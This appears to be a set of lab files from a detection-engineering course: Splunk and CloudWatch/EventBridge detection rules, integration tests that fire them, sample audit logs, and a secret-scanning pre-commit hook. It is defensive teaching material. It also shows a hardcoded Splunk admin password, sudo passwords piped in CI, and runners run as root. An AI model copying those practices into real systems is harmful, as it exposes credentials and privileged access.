/chapter-05/lab-5.5/pre-commit:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #git grep is grep but default scoped to your working commit dir
4 | #https://man7.org/linux/man-pages/man1/grep.1.html#EXIT_STATUS
5 | #https://git-scm.com/docs/git-grep
6 | #https://pre-commit.com/#new-hooks
7 |
8 | REGEX="(SECRET={\w{1,30})"
9 |
10 |
11 | grepSecrets() {
12 | echo "Checking for potential secrets..."
13 |
14 | if git grep -E "$(REGEX)"; then
15 | echo "Potential secrets found!"
16 | exit 1
17 | else
18 | echo "No secrets found"
19 | fi
20 | }
21 |
22 | grepSecrets
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/audit-example-log.txt:
--------------------------------------------------------------------------------
1 | type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="sshd" exe="/usr/sbin/sshd" key=(null)
2 | type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
3 | type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
4 | type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="bash" exe="/usr/bin/bash" key=(null)
5 | type=CWD msg=audit(1664132305.181:240): cwd="/home/jsmith"
6 | type=PATH msg=audit(1664132305.181:241): item=0 name="/bin/ls" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
7 | type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/buildspec.txt:
--------------------------------------------------------------------------------
1 | TEST_LOG:tests/audit-example-log.txt
2 | SPL_SEARCH:index=main exe=*bash
3 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/spl-integration-test.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | ### ENTER IN TERMINAL ###
4 | # Ensure splunk is running sudo /opt/splunk/bin/splunk start
5 | # you will need to sudo your exports because of session swap
6 | # in a CI this is easier to run as root because of env variable injections
7 | # run sudo bash
8 | # export SPLUNK_USER=''
9 | # export SPLUNK_PASSWORD=''
10 |
11 | ### buildspec.txt format ###
12 | #TEST_LOG:/tmp/audit-example-log.txt
13 | #SPL_SEARCH:index=main jsmith
14 |
15 | #SPL_USER=$(env | grep SPLUNK_USER | cut -d '=' -f2)
16 | #SPL_PASSWORD=$(env | grep SPLUNK_PASSWORD | cut -d '=' -f2)
17 | SPL_LOG="$pwd$(cat ./buildspec.txt | grep TEST_LOG | cut -d ':' -f2)"
18 | SPL_SEARCH=$(cat ./buildspec.txt | grep SPL_SEARCH | cut -d ':' -f2)
19 |
20 | echo $SPL_LOG
21 | #echo "$SPLUNK_USER:$SPLUNK_PASSWORD"
22 | echo $SPL_SEARCH
23 |
24 | echo "Adding test log entry..."
25 |
26 | sudo /opt/splunk/bin/splunk add oneshot $SPL_LOG -index main -hostname 127.0.0.1 -sourcetype 'syslog:linux:auditd' -auth "$SPLUNK_USER:$SPLUNK_PASSWORD"
27 |
28 | echo "Waiting for indexing..."
29 | sleep 3
30 | echo "Testing search..."
31 |
32 | RESULTS=$(sudo /opt/splunk/bin/splunk search "$SPL_SEARCH" -app search -maxout 10 -output auto -timeout 120 | wc -l)
33 |
34 | echo "Found: $RESULTS"
35 |
36 | if [[ $RESULTS -gt 0 ]]; then
37 | echo "Test PASS."
38 | else
39 | echo "Test FAILED."
40 | sudo /opt/splunk/bin/splunk stop
41 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
42 | echo "restarting splunkd for future testing..."
43 | sudo /opt/splunk/bin/splunk start
44 | exit 1
45 | fi
46 |
47 | echo "cleaning up logs from index..."
48 | sleep 1
49 | echo "splunkd must stop before cleaning.."
50 | sudo /opt/splunk/bin/splunk stop
51 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
52 | echo "restarting splunkd for future tests..."
53 | sudo /opt/splunk/bin/splunk start
54 | exit 0
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/spl-test-exp-backoff.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | ### ENTER IN TERMINAL ###
4 | # Ensure splunk is running sudo /opt/splunk/bin/splunk start
5 | # you will need to sudo your exports because of session swap
6 | # in a CI this is easier to run as root because of env variable injections
7 | # run sudo bash
8 | # export SPLUNK_USER=''
9 | # export SPLUNK_PASSWORD=''
10 |
11 | ### buildspec.txt format ###
12 | #TEST_LOG:/tmp/audit-example-log.txt
13 | #SPL_SEARCH:index=main jsmith
14 |
15 | #SPL_USER=$(env | grep SPLUNK_USER | cut -d '=' -f2)
16 | #SPL_PASSWORD=$(env | grep SPLUNK_PASSWORD | cut -d '=' -f2)
17 | SPL_LOG="$pwd$(cat ./buildspec.txt | grep TEST_LOG | cut -d ':' -f2)"
18 | SPL_SEARCH=$(cat ./buildspec.txt | grep SPL_SEARCH | cut -d ':' -f2)
19 |
20 | echo $SPL_LOG
21 | #echo "$SPLUNK_USER:$SPLUNK_PASSWORD"
22 | echo $SPL_SEARCH
23 |
24 | echo "Adding test log entry..."
25 |
26 | sudo /opt/splunk/bin/splunk add oneshot $SPL_LOG -index main -hostname 127.0.0.1 -sourcetype 'syslog:linux:auditd' -auth "$SPLUNK_USER:$SPLUNK_PASSWORD"
27 |
28 | echo "Waiting for indexing..."
29 | sleep 3
30 | echo "Testing search..."
31 |
32 | maxTries=3
33 | tries=1
34 | backoff=10
35 |
36 | while [ $tries -le $maxTries ]; do
37 |
38 | echo "Testing search attempt $tries..."
39 |
40 | RESULTS=$(sudo /opt/splunk/bin/splunk search "$SPL_SEARCH" -app search -maxout 10 -output auto -timeout 120 | wc -l)
41 |
42 | if [[ $RESULTS -gt 0 ]]; then
43 | echo "Test PASS."
44 | echo "Found: $RESULTS"
45 | break
46 | else
47 | echo "Test FAILED, retrying in $backoff seconds..."
48 | sleep $backoff
49 | ((backoff+=backoff))
50 | ((tries++))
51 | fi
52 |
53 | done
54 |
55 | if [ $tries -gt $maxTries ]; then
56 | echo "Search failed after $tries attempts"
57 | # cleanup and exit 1
58 | echo "Test FAILED."
59 | sudo /opt/splunk/bin/splunk stop
60 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
61 | echo "restarting splunkd for future testing..."
62 | sudo /opt/splunk/bin/splunk start
63 | exit 1
64 | fi
65 |
66 | echo "Found: $RESULTS"
67 |
68 | echo "cleaning up logs from index..."
69 | sleep 1
70 | echo "splunkd must stop before cleaning.."
71 | sudo /opt/splunk/bin/splunk stop
72 | sudo /opt/splunk/bin/splunk clean eventdata -index main -f
73 | echo "restarting splunkd for future tests..."
74 | sudo /opt/splunk/bin/splunk start
75 | exit 0
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk cli cmds.txt:
--------------------------------------------------------------------------------
1 | https://docs.splunk.com/Documentation/Splunk/latest/Data/MonitorfilesanddirectoriesusingtheCLI
2 | https://docs.splunk.com/Documentation/SplunkCloud/9.1.2308/SearchReference/AboutCLIsearches
3 |
4 | $SPLUNK_HOME/bin/splunk start --no-prompt
5 |
6 | ./splunk cmd python /opt/splunk/bin/scripts/oneshot \
7 | --index main \
8 | --source /home/ssm-user/Downloads/example-auditd-log.txt \
9 | --host 127.0.0.1
10 |
11 |
12 | /home/ssm-user/Downloads/example-auditd-log.txt
13 | sudo yum install expect -y
14 |
15 | ./splunk help add oneshot
16 | ./splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
17 |
18 | ----
19 |
20 |
21 | [root@ip-172-31-30-202 bin]# ./splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
22 | WARNING: Server Certificate Hostname Validation is disabled. Please see server.conf/[sslConfig]/cliVerifyServerName for details.
23 | Splunk username: admin
24 | Password:
25 | Oneshot '/home/ssm-user/Downloads/example-auditd-log.txt' added
26 | [root@ip-172-31-30-202 bin]#
27 |
28 |
29 | ---
30 |
31 | ----# Script #----
32 | #!/bin/bash
33 |
34 | username="admin"
35 | password="splunksplunk"
36 |
37 | # Turn off input echoing
38 | stty -echo
39 |
40 | # Run splunk command
41 | echo "$username" | /opt/splunk/bin/splunk add oneshot /home/ssm-user/Downloads/example-auditd-log.txt -index main -hostname 127.0.0.1 -sourcetype "syslog:linux:auditd"
42 |
43 | # Enter password via stdin pipe
44 | echo "$password"
45 |
46 | # Turn input echoing back on
47 | stty echo
48 |
49 | # Handle prompt
50 | yes | head -n1
51 |
52 |
53 | --- # search test # ---
54 |
55 | /opt/splunk/bin/splunk search 'index=main *jsmith* earliest=-4h' -app search -maxout 10 -output auto -timeout 120
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk debian download.txt:
--------------------------------------------------------------------------------
1 | wget -O splunk-9.1.2-b6b9c8185839-linux-2.6-amd64.deb "https://download.splunk.com/products/splunk/releases/9.1.2/linux/splunk-9.1.2-b6b9c8185839-linux-2.6-amd64.deb"
2 |
3 | wget -O splunk-9.1.2-b6b9c8185839.x86_64.rpm "https://download.splunk.com/products/splunk/releases/9.1.2/linux/splunk-9.1.2-b6b9c8185839.x86_64.rpm"
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/splunk-spl-int-test.yml:
--------------------------------------------------------------------------------
1 | name: Splunk SPL Testing
2 |
3 | # Controls when the workflow will run
4 | on:
5 | push:
6 | branches: [ "main" ]
7 | paths:
8 | - tests/*.log
9 | - tests/*.txt
10 | - buildspec.txt
11 | pull_request:
12 | branches: [ "main" ]
13 |
14 | # Allows you to run this workflow manually from the Actions tab
15 | workflow_dispatch:
16 |
17 | #when running commit prior to a push you setup the cli parameters that should trigger a detection
18 | env:
19 | #COMMIT_MESSAGE: ${{ github.event.head_commit.message }}
20 | SPLUNK_USER: ${{ secrets.SPLUNK_USER }}
21 | SPLUNK_PASSWORD: ${{ secrets.SPLUNK_PASSWORD }}
22 | SUDO_PASSWORD: ${{ secrets.SUDO_PASSWORD }}
23 |
24 | permissions:
25 | contents: read # This is required for actions/checkout
26 |
27 | jobs:
28 | splRuleTests:
29 | # The type of runner that the job will run on
30 | #runs-on: Ubuntu-latest
31 | runs-on: [self-hosted, splunk] #based on logical combination of labels
32 | #environment: production
33 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
34 | defaults:
35 | run:
36 | shell: bash
37 | steps:
38 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
39 | - uses: actions/checkout@v4
40 | #run SPL checks based on buildspec.txt
41 | #depends on splunk already being installed and configured
42 | - name: Set Root Privs
43 | run: |
44 | export RUNNER_ALLOW_RUNASROOT=1
45 | - name: Switch to Root
46 | run: |
47 | echo '$SUDO_PASSWORD' | sudo -S bash
48 | - name: Check Splunk Status
49 | run: |
50 | echo '$SUDO_PASSWORD' | sudo -S /opt/splunk/bin/splunk status
51 | #find . -type f -print0 | xargs -0 dos2unix
52 | - name: Run SPL Validation
53 | run: |
54 | echo '$SUDO_PASSWORD' | sudo -S chmod +x ./spl-integration-test.sh
55 | dos2unix ./spl-integration-test.sh
56 | dos2unix ./buildspec.txt
57 | ./spl-integration-test.sh
58 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/start-github-action-runner.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/bash
2 | cd /home/dc/Downloads/actions-runner
3 | ./run.sh &
4 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.1/tests/audit-example-log.txt:
--------------------------------------------------------------------------------
1 | type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="sshd" exe="/usr/sbin/sshd" key=(null)
2 | type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
3 | type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
4 | type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm="bash" exe="/usr/bin/bash" key=(null)
5 | type=CWD msg=audit(1664132305.181:240): cwd="/home/jsmith"
6 | type=PATH msg=audit(1664132305.181:241): item=0 name="/bin/ls" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
7 | type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct="jsmith" exe="/usr/sbin/sshd" hostname=? addr=? terminal=ssh res=success'
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/cloudwatch-metrics-cli-query.txt:
--------------------------------------------------------------------------------
1 | aws cloudwatch get-metric-data \
2 | --metric-data-queries '[
3 | {
4 | "Id": "metricQuery",
5 | "MetricStat": {
6 | "Metric": {
7 | "Namespace": "AWS/Events",
8 | "MetricName": "MatchedEvents",
9 | "Dimensions": [
10 | {
11 | "Name": "RuleName",
12 | "Value": "iam-access-key-generated-rule"
13 | }
14 | ]
15 | },
16 | "Period": 300,
17 | "Stat": "Sum"
18 | }
19 | }
20 | ]' \
21 | --start-time "2024-01-17T00:00:00Z" \
22 | --end-time "2024-01-17T23:59:59Z"
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/createAccessKeyPolicyCI.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "VisualEditor0",
6 | "Effect": "Allow",
7 | "Action": [
8 | "events:DescribeRule",
9 | "iam:DeleteAccessKey",
10 | "events:EnableRule",
11 | "events:CreateApiDestination",
12 | "events:PutRule",
13 | "iam:UpdateAccessKey",
14 | "events:DescribeEventSource",
15 | "iam:CreateAccessKey",
16 | "events:DescribeEventBus",
17 | "cloudwatch:ListTagsForResource",
18 | "events:ListTagsForResource",
19 | "events:ListTargetsByRule",
20 | "events:DescribeApiDestination",
21 | "iam:ListAccessKeys"
22 | ],
23 | "Resource": [
24 | "arn:aws:events:*::connection/*",
25 | "arn:aws:events:*::rule/*/*",
26 | "arn:aws:events:*::api-destination/*",
27 | "arn:aws:events:*::event-bus/*",
28 | "arn:aws:events:*::event-source/*",
29 | "arn:aws:iam:::user/*",
30 | "arn:aws:cloudwatch:*::service/*-*",
31 | "arn:aws:cloudwatch:*::alarm:*",
32 | "arn:aws:cloudwatch:*::insight-rule/*",
33 | "arn:aws:cloudwatch:*::slo/*"
34 | ]
35 | },
36 | {
37 | "Sid": "VisualEditor1",
38 | "Effect": "Allow",
39 | "Action": [
40 | "events:ListRuleNamesByTarget",
41 | "cloudwatch:GetMetricData",
42 | "cloudwatch:DescribeAlarmsForMetric",
43 | "events:ListRules",
44 | "events:ListEventBuses",
45 | "cloudwatch:GetMetricStatistics",
46 | "cloudwatch:ListMetrics"
47 | ],
48 | "Resource": "*"
49 | },
50 | {
51 | "Sid": "VisualEditor2",
52 | "Effect": "Allow",
53 | "Action": [
54 | "events:DescribeRule",
55 | "events:EnableRule",
56 | "events:PutRule",
57 | "events:ListTagsForResource",
58 | "events:ListTargetsByRule"
59 | ],
60 | "Resource": "arn:aws:events:*::rule/"
61 | }
62 | ]
63 | }
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/iam-access-key-generated-rule-CloudFormation-Template.yaml:
--------------------------------------------------------------------------------
1 | AWSTemplateFormatVersion: '2010-09-09'
2 | Description: CloudFormation template for EventBridge rule 'iam-access-key-generated-rule'
3 | Resources:
4 | EventRule0:
5 | Type: AWS::Events::Rule
6 | Properties:
7 | Description: Triggers when an IAM user creates an access key instead of using a role.
8 | EventBusName: default
9 | EventPattern:
10 | source:
11 | - aws.iam
12 | detail-type:
13 | - AWS API Call via CloudTrail
14 | detail:
15 | eventSource:
16 | - iam.amazonaws.com
17 | eventName:
18 | - CreateAccessKey
19 | Name: iam-access-key-generated-rule
20 | State: ENABLED
21 | Targets:
22 | - Id:
23 | Arn: arn:aws:sns:us-east-1::
24 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/main.tf:
--------------------------------------------------------------------------------
1 | # Terraform 0.13+ uses the Terraform Registry:
2 |
3 | terraform {
4 | backend "s3" {
5 | bucket = ""
6 | key = "aws-eventbridge-rules-tfstate"
7 | region = "us-east-1"
8 | }
9 | required_providers {
10 | aws = {
11 | source = "hashicorp/aws"
12 | version = "5.32.1"
13 | }
14 | }
15 | }
16 |
17 | # Configure the AWS Provider
18 | provider "aws" {
19 | region = "us-east-1"
20 | }
21 |
22 | ### START EVENTBRIDGE RULES SECTION ###
23 |
24 | resource "aws_cloudwatch_event_rule" "iamKeyCreated" {
25 | name = "security-iam-access-key-generated"
26 | description = "An IAM user has generated an long-term access key credential."
27 | event_bus_name = "default"
28 | state = "ENABLED"
29 | tags = {
30 | Name = "project" #tags must be in tf "map" format as kv pairs
31 | Environment = "packt"
32 | }
33 | #user json encode function within tf to ensure proper parsing
34 | event_pattern = jsonencode(
35 | {
36 | "source" : ["aws.iam"],
37 | "detail-type" : ["AWS API Call via CloudTrail"],
38 | "detail" : {
39 | "eventSource" : ["iam.amazonaws.com"],
40 | "eventName" : ["CreateAccessKey"]
41 | }
42 | }
43 | )
44 | }
45 | #you must include a target as part of the rule or it wont do anything
46 | resource "aws_cloudwatch_event_target" "sns" {
47 | rule = aws_cloudwatch_event_rule.iamKeyCreated.name #.name relates to the above resource
48 | target_id = "eventbridge-emailme" #replace with your SNS topic
49 | arn = "arn:aws:sns:us-east-1::eventbridge-emailme" #replace with yours
50 | }
51 |
52 | ### END RULE RESOURCE SECTION ####
53 |
54 | /*
55 | #this is part of the example in the terraform provider documentation
56 | #realistically you wouldnt have this in the rule because your
57 | #states and stacks should be separate infrastructure, not rule management
58 |
59 | resource "aws_sns_topic" "aws_logins" {
60 | name = "aws-console-logins"
61 | }
62 |
63 | resource "aws_sns_topic_policy" "default" {
64 | arn = aws_sns_topic.aws_logins.arn
65 | policy = data.aws_iam_policy_document.sns_topic_policy.json
66 | }
67 |
68 | data "aws_iam_policy_document" "sns_topic_policy" {
69 | statement {
70 | effect = "Allow"
71 | actions = ["SNS:Publish"]
72 |
73 | principals {
74 | type = "Service"
75 | identifiers = ["events.amazonaws.com"]
76 | }
77 |
78 | resources = [aws_sns_topic.aws_logins.arn]
79 | }
80 | }
81 | */
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/requirements.txt:
--------------------------------------------------------------------------------
1 | boto3==1.34.21
2 | botocore==1.34.21
3 | jmespath==1.0.1
4 | python-dateutil==2.8.2
5 | s3transfer==0.10.0
6 | six==1.16.0
7 | timedelta==2020.12.3
8 | urllib3==2.0.7
9 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/github-action-eventbridge-integration-testing.yml:
--------------------------------------------------------------------------------
1 | #uses github action runner with terraform and s3 backed state with oidc federation
2 | #deploys eventbridge rules and then checks for correct firing
3 | name: 'AWS EventBridge Integration Testing'
4 |
5 | on:
6 | push:
7 | branches: [ main ]
8 | pull_request:
9 | branches: [ main ]
10 | env:
11 | AWS_REGION : "us-east-1" #Change to reflect your Region
12 |
13 | permissions:
14 | contents: read
15 | id-token: write # This is required for requesting the JWT
16 |
17 | jobs:
18 | StaticTest-Rules-and-Deploy-Dynamic-Test:
19 | name: 'Static Validate Everbridge Terraform and Deploy'
20 | runs-on: ubuntu-latest
21 | environment: production
22 |
23 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
24 | defaults:
25 | run:
26 | shell: bash
27 | steps:
28 | # Checkout the repository to the GitHub Actions runner
29 | - name: Checkout
30 | uses: actions/checkout@v4
31 | - name: configure aws credentials
32 | uses: aws-actions/configure-aws-credentials@v4
33 | with:
34 | role-to-assume: arn:aws:iam::599752704917:role/GithubOIDC-Actions-Role-WdBZFIFGsMUs #change to reflect your IAM role’s ARN
35 | role-session-name: GitHub_to_AWS_via_FederatedOIDC
36 | aws-region: ${{ env.AWS_REGION }}
37 | #deploy python and cache requirements
38 | - name: Setup Python Packages
39 | uses: actions/setup-python@v5
40 | with:
41 | python-version: '3.10'
42 | cache: 'pip'
43 | - run: pip install -r ./requirements.txt
44 | # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc.
45 | - name: Terraform Init
46 | run: terraform init
47 |
48 | # Checks that all Terraform configuration files adhere to a canonical format
49 | - name: Terraform Format
50 | run: terraform fmt
51 |
52 | # Self Lint
53 | - name: Terraform Validate
54 | run: terraform validate -no-color
55 |
56 | # Generates an execution plan for Terraform
57 | - name: Terraform Plan
58 | run: terraform plan -input=false
59 |
60 | # On push to "main", build or change infrastructure according to Terraform configuration files
61 | # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks
62 | - name: Terraform Apply
63 | #if: github.ref == 'refs/heads/"main"' && github.event_name == 'push'
64 | run: terraform apply -auto-approve -input=false -no-color
65 |
66 | # Execute payload check on live env
67 | - name: Execute Rule Tests
68 | run: python ./tests/test-iam-access-key-generated-rule.py
69 | # Validate results in Cloudwatch Metrics
70 | - name: Validate Rule Tests
71 | run: python ./tests/validate-iam-access-key-generated-rule.py
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/test-iam-access-key-generated-rule.py:
--------------------------------------------------------------------------------
1 | import boto3, time
2 |
3 | #api client
4 | iam = boto3.client('iam')
5 |
6 | #variables setttings
7 | iam_username = ''
8 |
9 | try:
10 | #replace with a specific test user
11 | response = iam.create_access_key(UserName=iam_username)
12 | access_key = response['AccessKey']['AccessKeyId']
13 | secret_key = response['AccessKey']['SecretAccessKey']
14 |
15 | print("Access Key:", access_key)
16 | #print("Secret Key:", secret_key)
17 | time.sleep(3) #give API time to catch up
18 |
19 | #restore original state
20 | response = iam.delete_access_key(
21 | UserName=iam_username,
22 | AccessKeyId=access_key #required
23 | )
24 | print('IAM key generated and deleted successfully.')
25 | except ValueError:
26 | print('IAM key was not successfully created and deleted for: ', iam_username)
27 | exit(1)
28 |
29 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/testing.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import boto3
3 |
4 | # Create a CloudWatch client
5 | cloudwatch = boto3.client('cloudwatch')
6 |
7 | # Define the parameters for the metric query
8 | namespace = 'AWS/Events'
9 | metric_name = 'MatchedEvents'
10 | rule_name = 'iam-access-key-generated-rule'
11 |
12 | # Query the metric data
13 | response = cloudwatch.get_metric_data(
14 | MetricDataQueries=[
15 | {
16 | 'Id': 'metric_query',
17 | 'MetricStat': {
18 | 'Metric': {
19 | 'Namespace': namespace,
20 | 'MetricName': metric_name,
21 | 'Dimensions': [
22 | {
23 | 'Name': 'RuleName',
24 | 'Value': rule_name
25 | }
26 | ]
27 | },
28 | 'Period': 300, # 5 minutes
29 | 'Stat': 'Sum', # You can change this to other statistics like 'Average', 'Maximum', etc.
30 | 'Unit': 'Count'
31 | }
32 | }
33 | ],
34 | StartTime='2024-01-17T00:00:00Z',
35 | EndTime='2024-01-17T23:59:59Z'
36 | )
37 |
38 | # Process the response
39 | try:
40 | if 'MetricDataResults' in response:
41 | for result in response['MetricDataResults']:
42 | #print(type(result))
43 | print(f"Result output: ", result['Values'][0])
44 | if result['Values'][0] > 0:
45 | print('Test Pass')
46 | if result['Values'][0] == "":
47 | print('Test Failed, no results')
48 | exit(1)
49 | else:
50 | print('Test failed')
51 | exit(1)
52 | except ValueError:
53 | print("Test Failed")
--------------------------------------------------------------------------------
/chapter-06/lab-6.2/tests/validate-iam-access-key-generated-rule.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from datetime import datetime, timedelta
3 | import boto3, time
4 |
5 | #sleeping up to 3 minutes for event detection catchup
6 | print("Sleeping for 1 minute for AWS CloudWatch Metrics to Catch Up...")
7 | time.sleep(60)
8 |
9 | #api client construct and assumes you have STS token active
10 | cloudwatch = boto3.client('cloudwatch')
11 |
12 | #set variables for your test
13 | namespace = 'AWS/Events'
14 | metric_name = 'MatchedEvents'
15 | rule_name = 'security-iam-access-key-generated'
16 |
17 | #aws requires start/end time in strtime UTC format
18 | end_time = datetime.utcnow()
19 | start_time = end_time - timedelta(minutes=15) #obviously change this to something reasonable ~5-20 min
20 |
21 | start_time = start_time.strftime('%Y-%m-%dT%H:%M:%SZ')
22 | end_time = end_time.strftime('%Y-%m-%dT%H:%M:%SZ')
23 |
24 | print("Checking Start Time:", start_time)
25 | print("Checking End Time:", end_time)
26 |
27 | #use cloudwatch metric query to evaluate results
28 | response = cloudwatch.get_metric_data(
29 | MetricDataQueries=[
30 | {
31 | 'Id': 'metric_query',
32 | 'MetricStat': {
33 | 'Metric': {
34 | 'Namespace': namespace,
35 | 'MetricName': metric_name,
36 | 'Dimensions': [
37 | {
38 | 'Name': 'RuleName',
39 | 'Value': rule_name
40 | }
41 | ]
42 | },
43 | 'Period': 300, #use 5 minute intervals as the metric
44 | 'Stat': 'Sum', #you can change this based on the console
45 | 'Unit': 'Count'
46 | }
47 | }
48 | ],
49 | StartTime=start_time,
50 | EndTime=end_time
51 | )
52 |
53 | #actual test logic
54 | try:
55 | if 'MetricDataResults' in response:
56 | for result in response['MetricDataResults']:
57 | #print(type(result))
58 | print(result)
59 | print(f"Result output: ", result['Values'][0])
60 | if result['Values'][0] > 0:
61 | print('Test Pass')
62 | else:
63 | print('Test failed')
64 | exit(1)
65 | except ValueError:
66 | print("Test Failed")
67 | exit(1)
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/BASE-get-detections-host-cs copy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os, json
3 | from datetime import datetime, timedelta
4 | from falconpy import APIHarnessV2
5 |
6 | # Get API credentials from environment variables
7 | CS_CLIENT_ID = os.environ.get('CS_CLIENT_ID')
8 | CS_CLIENT_SECRET = os.environ.get('CS_CLIENT_SECRET')
9 |
10 | # Set the time range for the detection alert query
11 | current_time = datetime.now()
12 | last4h = current_time - timedelta(hours=4)
13 |
14 | lookup_time = last4h.strftime("%Y-%m-%dT%H:%M:%SZ")
15 | #print(lookup_time)
16 |
17 | # Do not hardcode API credentials!
18 | falcon = APIHarnessV2(client_id=CS_CLIENT_ID, client_secret=CS_CLIENT_SECRET)
19 |
20 | host_name = "dc-ubuntu"
21 |
22 | filter_query = f"last_behavior:<='{lookup_time}', device.hostname:'{host_name}'"
23 | #filter_query = f"device.hostname:'{host_name}'"
24 |
25 | response = falcon.command("QueryDetects",
26 | offset=0,
27 | limit=50,
28 | sort="last_behavior|desc",
29 | filter=filter_query
30 | )
31 |
32 | #print(type(response))
33 | detectid_values_list = response['body']['resources']
34 |
35 | BODY = {
36 | "ids": detectid_values_list
37 | }
38 |
39 | response = falcon.command("GetDetectSummaries", body=BODY)
40 | #returned json sometimes has non complianct chars
41 | response = json.dumps(response) #converts to string
42 | response = json.loads(response) #converts back to json compatible dictionary
43 | #print(type(response))
44 |
45 | if response['status_code'] in range(200,299): #in case they add 2XX additional states in future
46 | for resource in response['body']['resources']:
47 | for behavior in resource['behaviors']:
48 | cmdline = behavior['cmdline']
49 | tactic_id = behavior['tactic_id']
50 | display_name = behavior['display_name']
51 | severity = behavior['severity'] # integer
52 | confidence = behavior['confidence'] # integer
53 | print('#### Detections Triggered ####')
54 | print(f'Cmdline: {cmdline}')
55 | print(f'Tactic ID: {tactic_id}')
56 | print(f'Display Name: {display_name}')
57 | print(f'Severity: {severity}')
58 | print(f'Confidence: {confidence}')
59 |
60 |
--------------------------------------------------------------------------------
/chapter-06/lab-6.3/Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf:
--------------------------------------------------------------------------------
